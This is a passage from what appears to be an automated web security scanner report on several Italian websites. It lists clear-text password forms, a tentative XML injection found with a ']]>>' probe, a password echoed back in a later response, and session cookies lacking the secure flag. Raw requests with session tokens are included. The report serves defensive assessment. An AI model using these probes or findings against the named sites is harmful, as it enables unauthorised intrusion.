Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slat=1304375040; kp=1304375180480908

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:30:24 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 6649
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>


<title>Login Virgilio Alic
...[SNIP]...
<body>
<form id="mail_servizi" name="mail_servizi" method="post" action="">
<div id="box-mail">
...[SNIP]...
<input name="usernameDisplay" id="usernameDisplay" tabindex="1" class="casella" type="text">
Password
<input name="password" id="password" tabindex="2" class="casella" type="password">
</div>
...[SNIP]...

7.9. http://www.genialloyd.it/GlfeWeb/area_personale/recupera_password.jsp

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.genialloyd.it
Path:   /GlfeWeb/area_personale/recupera_password.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /GlfeWeb/area_personale/recupera_password.jsp HTTP/1.1
Host: www.genialloyd.it
Proxy-Connection: keep-alive
Referer: http://www.genialloyd.it/GlfeWeb/gl/it/home.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gvsC=New; channel=Direct Load; __utmz=180333819.1304392441.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=180333819.1211521102.1304392441.1304392441.1304392441.1; __utmc=180333819; JSESSIONID=00005WFXekXZm0F_JebtWBl4ats:13tj0fe6g

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:55:00 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Language: it
Content-Length: 12581


                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
</h2><form name="homePageForm" method="post" action="/GlfeWeb/do/processHomePage"><input type="hidden" name="org.apache.struts.taglib.html.TOKEN" value="b66a3fcee95af683a7bb547bcebd9fbd">
...[SNIP]...
type="text" name="loginModel.userName" value="Username" onblur="(this.value=='')?this.value='Username':void(0);" onfocus="(this.value=='Username')?this.value='':void(0);" class="text" title="Username"><input type="password" name="loginModel.password" value="Password" onblur="(this.value=='')?this.value='Username':void(0);" onfocus="(this.value!='')?this.value='':void(0);" style="margin: 5px 0 0 0;" class="text" title="Password"><input type="hidden" name="method" value="login">
...[SNIP]...

7.10. http://www.genialloyd.it/GlfeWeb/gl/it/home.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.genialloyd.it
Path:   /GlfeWeb/gl/it/home.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /GlfeWeb/gl/it/home.html HTTP/1.1
Host: www.genialloyd.it
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:15:18 GMT
Server: IBM_HTTP_Server
Pragma: No-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Last-Modified: Mon, 02 May 2011 21:55:44 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 37797
Set-Cookie: JSESSIONID=0000VYnvNhNSM1dzVj-GDr5f3Wj:13tj0fg0c; Path=/
Content-Type: text/html; charset=UTF-8
Content-Language: it-IT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="it" xml:lang="it" xmlns="http://www.w3.org/1999/xhtml"><head><t
...[SNIP]...
</div><form name="homePageForm" method="post" action="/GlfeWeb/do/processHomePage"><div class="neutral">
...[SNIP]...
pe="text" name="loginModel.userName" value="Username" onblur="(this.value=='')?this.value='Username':void(0);" onfocus="(this.value=='Username')?this.value='':void(0);" class="text" title="Username" /><input type="password" name="loginModel.password" value="Password" onblur="(this.value=='')?this.value='Username':void(0);" onfocus="(this.value!='')?this.value='':void(0);" style="margin: 5px 0 0 0;" class="text" title="Password" /><input type="hidden" name="method" value="login" />
...[SNIP]...

7.11. http://www.shopping24.ilsole24ore.com/sh4/catalog/Category.jsp

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shopping24.ilsole24ore.com
Path:   /sh4/catalog/Category.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /sh4/catalog/Category.jsp?CATID=SH246140 HTTP/1.1
Host: www.shopping24.ilsole24ore.com
Proxy-Connection: keep-alive
Referer: http://www.banchedati.ilsole24ore.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304392432179; s_vi=[CS]v1|26DF9655051D19B5-40000103E0001B23[CE]; s_cm_NW=undefinedburpburp; s_cc=true; s_nr=1304393236452-New; SC_LINKS_NW=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:32:12 GMT
Set-Cookie: JSESSIONID=D34A5D9383893442C0CECE0969DFDC09; Path=/
Set-Cookie: ATG_SESSION_ID=D34A5D9383893442C0CECE0969DFDC09; Path=/
X-ATG-Version: ATGPlatform/9.0p1 [ DPSLicense/0 ]
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 53599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Cont
...[SNIP]...
<div class="function-login">
<form action="http://du.ilsole24ore.com/du/authfiles/logincentrale.asp" method="post">
           <input name="ErrURL" type="hidden" value='http://www.shopping24.ilsole24ore.com:80/sh4/catalog/Category.jsp?CATID=SH246140&login=failed'>
...[SNIP]...
</label>
           <input type="password" name="TxtPassword" class="textbox"/>
           </p>
...[SNIP]...

7.12. http://www.shopping24.ilsole24ore.com/sh4/catalog/Product.jsp

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shopping24.ilsole24ore.com
Path:   /sh4/catalog/Product.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /sh4/catalog/Product.jsp?PRODID=SH246237857 HTTP/1.1
Host: www.shopping24.ilsole24ore.com
Proxy-Connection: keep-alive
Referer: http://www.shopping24.ilsole24ore.com/sh4/catalog/Category.jsp?CATID=SH245868
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookies=true; s_vi=[CS]v1|26DF9655051D19B5-40000103E0001B23[CE]; s_cm_NW=undefinedwww.shopping24.ilsole24ore.comwww.shopping24.ilsole24ore.com; s_lastvisit=1304398129881; SC_LINKS_NW=%5B%5BB%5D%5D; SC_LINKS_VG=%5B%5BB%5D%5D; JSESSIONID=53628C5A5A5C18CA15C1BF2309D1783D; ATG_SESSION_ID=53628C5A5A5C18CA15C1BF2309D1783D; s_cc=true; __utmz=30117245.1304398796.2.2.utmcsr=luxury24.ilsole24ore.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=30117245.1497251666.1304393428.1304393428.1304398796.2; __utmc=30117245; __utmb=30117245.1.10.1304398796; c=undefinedwww.luxury24.ilsole24ore.comwww.luxury24.ilsole24ore.com; s_nr=1304399018901-New; SC_LINKS_SH=S24%3Aprodotti%3ASoftware%3Ahome%5E%5E%5E%5ES24%3Aprodotti%3ASoftware%3Ahome%20%7C%20no%20%26lid%5E%5E; s_sq=s24oshoppreprod%3D%2526pid%253DS24%25253Aprodotti%25253ASoftware%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A//www.shopping24.ilsole24ore.com/sh4/catalog/Product.jsp%25253FPRODID%25253DSH246237857%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 00:11:42 GMT
X-ATG-Version: ATGPlatform/9.0p1 [ DPSLicense/0 ]
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 33961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Small Office 24
...[SNIP]...
<div class="function-login">
<form action="http://du.ilsole24ore.com/du/authfiles/logincentrale.asp" method="post">
           <input name="ErrURL" type="hidden" value='http://www.shopping24.ilsole24ore.com:80/sh4/catalog/Product.jsp?PRODID=SH246237857&login=failed'>
...[SNIP]...
</label>
           <input type="password" name="TxtPassword" class="textbox"/>
           </p>
...[SNIP]...

7.13. http://www.shopping24.ilsole24ore.com/sh4/catalog/order/statoOrdine.jsp

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shopping24.ilsole24ore.com
Path:   /sh4/catalog/order/statoOrdine.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /sh4/catalog/order/statoOrdine.jsp;jsessionid=53628C5A5A5C18CA15C1BF2309D1783D HTTP/1.1
Host: www.shopping24.ilsole24ore.com
Proxy-Connection: keep-alive
Referer: http://www.shopping24.ilsole24ore.com/sh4/catalog/Category.jsp?CATID=SH246140
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookies=true; s_lastvisit=1304392432179; s_vi=[CS]v1|26DF9655051D19B5-40000103E0001B23[CE]; s_cm_NW=undefinedburpburp; SC_LINKS_NW=%5B%5BB%5D%5D; JSESSIONID=53628C5A5A5C18CA15C1BF2309D1783D; ATG_SESSION_ID=53628C5A5A5C18CA15C1BF2309D1783D; s_cc=true; __utmz=30117245.1304393428.1.1.utmcsr=banchedati.ilsole24ore.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=30117245.1497251666.1304393428.1304393428.1304393428.1; __utmc=30117245; __utmb=30117245.1.10.1304393428; c=undefinedwww.banchedati.ilsole24ore.comwww.banchedati.ilsole24ore.com; s_nr=1304393455616-New; SC_LINKS_SH=S24%3Aprodotti%3APeriodici%3Ahome%5E%5E%5E%5ES24%3Aprodotti%3APeriodici%3Ahome%20%7C%20no%20%26lid%5E%5E; s_sq=s24oshoppreprod%3D%2526pid%253DS24%25253Aprodotti%25253APeriodici%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A//www.shopping24.ilsole24ore.com/sh4/catalog/order/statoOrdine.jsp%25253Bjsessionid%25253D53628C5A5A5C18CA1%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:34:24 GMT
X-ATG-Version: ATGPlatform/9.0p1 [ DPSLicense/0 ]
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 20436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Stato ordine</t
...[SNIP]...
<div class="function-login">
<form action="http://du.ilsole24ore.com/du/authfiles/logincentrale.asp" method="post">
           <input name="ErrURL" type="hidden" value='http://www.shopping24.ilsole24ore.com:80/sh4/catalog/order/statoOrdine.jsp?login=failed'>
...[SNIP]...
</label>
           <input type="password" name="TxtPassword" class="textbox"/>
           </p>
...[SNIP]...

7.14. http://www.telecomitalia.it/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.telecomitalia.it
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.telecomitalia.it
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:13:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
X-Drupal-Cache: HIT
Etag: "1304374209-1"
Cache-Control: public, max-age=0
Last-Modified: Mon, 02 May 2011 22:10:09 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 45389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it" lang="it" dir="ltr">
<head>
<
...[SNIP]...
</div><form action="/auth" accept-charset="UTF-8" method="post" id="ti-auth-login1-form">
<div>
...[SNIP]...
ame" class="username"
onblur="this.value=(this.value=='') ? 'Username' : this.value;"
onfocus="this.style.color='#000000'; this.value=(this.value=='Username') ? '' : this.value;" />
<input tabindex="200" id="password-false" type="password" name="password" class="password" value="Password"
onblur="this.value=(this.value=='') ? 'Password' : this.value;"
onfocus="this.style.color='#000000'; this.value=(this.value=='Password') ? '' : this.value;" />

       <label class="invisible" for="password">
...[SNIP]...

8. XML injection

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://finanza-mercati.ilsole24ore.com
Path:   /quotazioni.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.

Request

GET /quotazioni.php]]>> HTTP/1.1
Host: finanza-mercati.ilsole24ore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 22:28:53 GMT
Server: Apache/2.2.10 (Linux/SUSE)
Vary: accept-language,accept-charset,Accept-Encoding,User-Agent
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1062

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

9. Password returned in later response

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.genialloyd.it
Path:   /GlfeWeb/area_personale/recupera_password.jsp

Issue description

Passwords submitted to the application are returned in clear form in later responses from the application. This behaviour increases the risk that users' passwords will be captured by an attacker. Many types of vulnerability, such as weaknesses in session handling, broken access controls, and cross-site scripting, would enable an attacker to leverage this behaviour to retrieve the passwords of other application users. This possibility typically exacerbates the impact of those other vulnerabilities, and in some situations can enable an attacker to quickly compromise the entire application.

Issue remediation

There is usually no good reason for an application to return users' passwords in its responses. This behaviour should be removed from the application.

Request 1

POST /GlfeWeb/do/processHomePage HTTP/1.1
Host: www.genialloyd.it
Proxy-Connection: keep-alive
Referer: http://www.genialloyd.it/GlfeWeb/gl/it/home.html
Cache-Control: max-age=0
Origin: http://www.genialloyd.it
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000M-S4UAsOKhKYucD4N5NOSNU:13tj0fe6g; gvsC=New; channel=Direct Load; __utmz=180333819.1304392441.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=180333819.1211521102.1304392441.1304392441.1304392441.1; __utmc=180333819
Content-Length: 139

org.apache.struts.taglib.html.TOKEN=01df86a0e89a7f431ff71a97666a966e&loginModel.userName=Username&loginModel.password=Password&method=login

Response 1

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 23:54:52 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://www.genialloyd.it/GlfeWeb/do/prepareLogin
Content-Length: 0
Set-Cookie: JSESSIONID=0000skVjWkCGNXBw3Njtz53N4Su:13tj0fe6g; Path=/
Content-Type: text/html
Content-Language: it-IT

Request 2

GET /GlfeWeb/area_personale/recupera_password.jsp HTTP/1.1
Host: www.genialloyd.it
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gvsC=New; channel=Direct Load; __utmz=180333819.1304392441.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=180333819.1211521102.1304392441.1304392441.1304392441.1; __utmc=180333819; JSESSIONID=00005WFXekXZm0F_JebtWBl4ats:13tj0fe6g

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:55:08 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Language: it
Content-Length: 12581


                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<input type="password" name="loginModel.password" value="Password" onblur="(this.value=='')?this.value='Username':void(0);" onfocus="(this.value!='')?this.value='':void(0);" style="margin: 5px 0 0 0;" class="text" title="Password">
...[SNIP]...

10. SSL cookie without secure flag set
There are 12 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


10.1. https://account.musfiber.com/login.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://account.musfiber.com
Path:   /login.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login.php HTTP/1.1
Host: account.musfiber.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 21:32:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=bq4jvcopcniq8jdvo0dtnu3n95; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18865

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/Main.dwt" codeOutsideHTMLIsLocked="false" -->
<he
...[SNIP]...

10.2. https://areaclienti187.telecomitalia.it/auth/recuperapassword.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://areaclienti187.telecomitalia.it
Path:   /auth/recuperapassword.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /auth/recuperapassword.do HTTP/1.1
Host: areaclienti187.telecomitalia.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:23:22 GMT
Server: Apache
Cache-Control: No-Cache
Cache-Control: no-cache="set-cookie"
Pragma: No-Cache
Content-Length: 6011
Expires: -1
Set-Cookie: JSESSIONID_AUTH=8xp2N1nh8BBHsHSDpxKfQvZTQGTxjLZYp8L4W6D1dGRYvPJ6SG1G!1105479713; path=/
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...

10.3. https://areaclienti187.telecomitalia.it/auth/registrautente.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://areaclienti187.telecomitalia.it
Path:   /auth/registrautente.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /auth/registrautente.do HTTP/1.1
Host: areaclienti187.telecomitalia.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:23:24 GMT
Server: Apache
Cache-Control: No-Cache
Cache-Control: no-cache="set-cookie"
Pragma: No-Cache
Expires: -1
Set-Cookie: JSESSIONID_AUTH=zdfWN1nchhvzYNWhbqpHMStZrjhmgxwlRN3LjKtxyY1jyShhywL4!519317924; path=/
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 24761

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w
...[SNIP]...

10.4. https://areaclienti187.telecomitalia.it/cdas187/d/a/p18485/serv.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://areaclienti187.telecomitalia.it
Path:   /cdas187/d/a/p18485/serv.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cdas187/d/a/p18485/serv.do HTTP/1.1
Host: areaclienti187.telecomitalia.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 22:23:24 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Content-Length: 2923
Set-Cookie: JSESSIONID_187CDAS=h72QN1ncLn59VV1nLzn2G6CN3GxcTPPH5rL1zPy022ctxnzFxMnC!-1329674579; path=/cdas187
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding, User-Agent


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" style="overflow:hidden;"
...[SNIP]...

10.5. https://areaclienti187.telecomitalia.it/cdas187/d/a/p21608/serv2.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://areaclienti187.telecomitalia.it
Path:   /cdas187/d/a/p21608/serv2.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cdas187/d/a/p21608/serv2.do HTTP/1.1
Host: areaclienti187.telecomitalia.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 22:23:30 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Content-Length: 2923
Set-Cookie: JSESSIONID_187CDAS=zn7KN1nCQT9GwTtRG9hmSm5nLcMP5Qtv5dTLTh3yhfPQKJRJ6TTK!6541692; path=/cdas187
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding, User-Agent


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" style="overflow:hidden;"
...[SNIP]...

10.6. https://areaclienti187.telecomitalia.it/cdas187/d/a/p21618/serv3.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://areaclienti187.telecomitalia.it
Path:   /cdas187/d/a/p21618/serv3.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cdas187/d/a/p21618/serv3.do HTTP/1.1
Host: areaclienti187.telecomitalia.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 22:23:31 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Content-Length: 2923
Set-Cookie: JSESSIONID_187CDAS=4894N1nDrQnTjgkyyxpjy5R22JChxQr3lZXQCDMq1pt2gwVLcG3W!-1852540237; path=/cdas187
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding, User-Agent


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
